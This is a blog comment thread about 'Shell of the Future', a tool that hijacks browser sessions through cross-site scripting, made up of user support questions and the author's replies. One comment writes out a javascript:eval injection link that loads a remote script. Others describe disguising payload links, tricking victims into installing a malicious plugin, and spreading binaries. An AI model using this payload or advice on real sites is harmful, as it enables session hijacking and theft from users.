Comments on Attack and Defense Labs: Shell of the Future – Reverse Web Shell Handler for XSS Exploitation
(comment feed, last updated 2024-01-24; newest first)

Kawartha Answers (http://www.kleventdesign.ca/answers/), 2013-07-15 02:37 -07:00:
I know this is kind of off topic, but I'm having problems with XSS Shell; the commands are not working. I have already uploaded it to 3 hosting sites and still have no luck executing the commands. Hey admin! This tool is very slow, please update, threaded code is needed.

Web izrada (http://www.swebdizajn.com), 2012-01-14 07:45 -08:00:
Is there a solution for this malware on the site? An infection on the Linux server, where something in the WordPress script constantly generates files of the type wb 5433712.php; the anti-malware program says it is a malware called Backdoor.PHP.WebShell! E2.
The worst thing is that this malware also creates an .htaccess file which redirects to infected sites and compromised Russian sites.
Is there a solution?

Anonymous, 2011-10-10 02:21 -07:00:
@lava
Yup, I've tried BeEF already and I was amazed at its capabilities; however, it is limited to a single session only, the attack won't work if the victim clicks another page... hmmmm, but I got an idea to bypass this somehow. I'll try your script above and replace it with BeEF's hook.js hahaha...

lava (http://www.andlabs.org), 2011-10-09 07:32 -07:00:
@anon
Thanks, that's a good suggestion; however, I plan to keep this specifically for 'Reverse Browsing Shell' alone.
I would recommend taking a look at the latest version of BeEF - https://code.google.com/p/beef/
It has many powerful features, including the one you mentioned. Hope this helps!

Anonymous, 2011-10-09 01:56 -07:00:
Hi lava! Thanks for creating this wonderful tool, but it would be great if you could add some commands like alert messages, like the ones in XSS Shell by Ferruh. I know this is kind of off topic, but I'm having problems with XSS Shell; the commands are not working. I have already uploaded it to 3 hosting sites and still have no luck executing the commands.

lava (http://www.andlabs.org), 2011-05-04 10:13 -07:00:
@anon
The slowness is not due to threading issues but due to the nature of the technique used.
Please refer to points 4 & 5 in the FAQ - http://www.andlabs.org/tools/sotf/sotf.html#faq

Anonymous, 2011-05-04 03:35 -07:00:
Hey admin! This tool is very slow, please update, threaded code is needed.

lava (http://www.andlabs.org), 2011-02-25 12:49 -08:00:
It's for the attacker's browser, so that he can add a banner or something to the victim's session when browsing from his machine. Makes for a better PoC.
If you want to make changes to the victim's browser, then you would have to add that code to the JS exploit that gets injected into the victim's browser.

Anonymous, 2011-02-25 12:31 -08:00:
The match and replace, is it for the victim or the attacker?

lava (http://www.andlabs.org), 2011-02-25 12:06 -08:00:
No Roni, that's not how it works. The victim does not use Shell of the Future as a proxy. The attacker configures his browser to use it as a proxy.
The victim only talks to the server component.
You must inject your script into the victim's browser using XSS or from the URL bar.

Anonymous (roni), 2011-02-25 11:10 -08:00:
Hi lava, thanks for the fast reply.
Let me try to explain again what I am trying to do:
I want the victim to use your server+proxy as a proxy, and then when he connects to it to take a new page from www.yahoo.com, for example => I will replace /script/ with your script.

Is it possible?
Because from what I understood you are working as a full proxy for the victim.

Thanks again, roni

lava (http://www.andlabs.org), 2011-02-25 09:47 -08:00:
@roni
The proxy-only mode would work when the server component is hosted separately, on an external web server.
If you are running it locally, then select the 'server+proxy' mode, which is the default.
The victim talks with the server, and since you were not running the server, the victim didn't get any response.
Hope this helps.

Roni Bachar (http://ronibachar.blogspot.com), 2011-02-25 06:18 -08:00:
Hello,

I have tried to work with the program as a proxy only,
and for some reason it doesn't work.
I have tried to work with a victim passing through the proxy and then replace its title with something else, with no success; on the victim I didn't get any response.
Am I doing something wrong, or does the proxy have a problem?

lava (http://www.andlabs.org), 2010-09-19 03:44 -07:00:
@dinhcaohack
How do you want the binary to be delivered, by prompting the user for a download or by exploiting a browser vulnerability?
I am trying to keep this specific to proxying for now.
The next version of BeEF (http://code.google.com/p/beef/) would probably be able to do that. Keep an eye on that project, lots of interesting things going on there :)

dinhcaohack (http://vniss.net), 2010-09-18 12:09 -07:00:
Do you have any idea how to spread a binary file through this XSS shell? :D

lava (http://www.andlabs.org), 2010-09-10 10:35 -07:00:
You sure can, Soroush.
I realize that I didn't specify any license, I was a little lazy to do that :D. You can do whatever you want with that code, full rights!
If possible, it would be nice if you could share your module with others as well. I could probably add it in the next version.

Soroush Dalili (http://soroush.secproject.com/blog/), 2010-09-10 06:55 -07:00:
Sorry if I'm a bit late.
I'm trying to create a good presentation for XSS attacks. After XSS tunneling, I've tried your application. It seems very interesting for PoCs (not for exploitation by malicious attackers).
I want to add some code to your application. However, I'm not sure if you allow others to do that, as you did not say anything about the license. Could you please tell me if I can modify your code for my needs? Can I add new modules to it?

lava (http://www.andlabs.org), 2010-09-08 04:04 -07:00:
@anon
The effect is specific to the site containing the XSS vulnerability, unless we are looking at a Universal XSS browser bug.

However, with cross-domain resource usage and interdependence on the rise, one vulnerable site could indirectly render others vulnerable as well.

A smart attacker would piggyback on the trust the user places in the vulnerable site to obtain further access. dev.twitter.com is currently vulnerable to XSS. An attacker can exploit this vulnerability to display a fake message to the victim asking them to install a new browser plug-in from Twitter.com. Since the user trusts Twitter.com, he is going to install this plugin, giving the attacker complete control over his browser.

Anonymous, 2010-09-07 19:15 -07:00:
@lava
I'll admit that you make some excellent points, lava.
Curious, does this shell exploit user session info for only the target site or for all of the user's traffic?

lava (http://www.andlabs.org), 2010-09-06 23:55 -07:00:
@anon
The link is not really a problem; it can be encoded to look harmless. Moreover, the payload does not even have to be a part of the link; it can be inside a page which would load the URL with the payload automatically.

If an attacker is only interested in accessing the victim's account on a site, then exploiting an XSS on that site is all he needs.

Unless you are looking at running a botnet or gaining complete system access, installing a RAT is unnecessary overkill, and you also run the risk of being picked up by AVs.

Needless to say, these days people store more information online than they do on their local hard drive.

Anonymous, 2010-09-06 16:44 -07:00:
Client-side XSS is not a serious problem. Only an idiot would click on a link that looks like this:
http://www.site.comjavascript:eval("s=document.createElement('script');s.src='http://127.0.0.1/e1.js';document.getElementsByTagName('head')[0].appendChild(s)")

I mean seriously, if you're going to get them to click on a link, make it a less conspicuous one that gives them a Java drive-by RAT, which is far more serious than this shell.

lava (http://www.andlabs.org), 2010-08-12 11:32 -07:00:
@anon

I am glad you are trying out the tool.
From what I understand, you are able to hijack the session, but the hijacked session does not display a banner like it should.
The reason this could be happening is that the URL ends with '.html' or some other extension which is part of the 'direct fetch' white-list. So Shell of the Future is fetching this page directly from the server instead of routing it through the victim.

If this is the case, then make suitable changes to the direct-fetch configuration and it should work.

The 'Hijack Session' link is meant to be the way you explained. When you click the link, Shell of the Future sets the victim ID in a cookie and starts tunneling your session.

Hopefully this should resolve the issue; please let me know if it doesn't.

Anonymous, 2010-08-12 09:08 -07:00:
Hi,
I have a small issue with the tool; I'd be happy if you could help me out. I get the JS script properly loaded and logged into the SotF console, however clicking the link just brings me to the website, no banner, no control.

The link "Hijack Session" is just a blank link to the XSSed website with the parameter &ShelloftheFuture_victimID=1

Kind of puzzled right now, thanks for any help.

lava (http://www.andlabs.org), 2010-08-04 11:54 -07:00:
@pat
That happens in Firefox; adding a new element to the DOM from the URL bar does not seem to work. Try it in Chrome, it works perfectly.

Anonymous (pat), 2010-08-04 02:30 -07:00:
Hi!

When I try to inject the javascript:eval... into a browser, it results in a blank page with "[object HTMLScriptElement]".
Don't know why this is happening... but I managed to hijack the session just using the script src version.

/pat